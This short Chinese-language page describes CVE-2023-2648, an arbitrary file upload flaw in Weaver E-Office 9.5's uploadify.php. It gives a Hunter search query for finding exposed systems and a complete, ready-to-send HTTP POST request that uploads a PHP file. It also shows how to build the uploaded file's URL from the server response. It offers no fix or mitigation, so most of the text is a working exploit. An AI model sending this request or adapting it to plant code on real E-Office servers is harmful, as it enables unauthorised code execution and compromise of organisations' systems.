登录 白背景
源码

泛微E-Office uploadify存在任意文件上传漏洞(CVE-2023-2648)

一、漏洞简介

<font style="color:rgb(0, 0, 0);">泛微 E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。泛微 E-Office 9.5版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。</font>

<font style="color:rgb(0, 0, 0);">二、影响版本</font>

  • <font style="color:rgb(0, 0, 0);">泛微 E-Office 9.5</font>

<font style="color:rgb(0, 0, 0);">三、资产测绘</font>

  • hunterapp.name="泛微 e-office OA"
  • 特征

1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e.png

四、漏洞复现

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: test
Connection: close
Content-Length: 491
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

1699626187799-74d8cd8f-7694-4cef-8d2e-d35f2ac91d9e.png

根据回显拼接得到上传文件位置

/attachment/1031311196/666.php

1699626229126-afcb7e78-38f5-40b1-9e27-a0cd732f7de2.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fvl446rh63tdymm0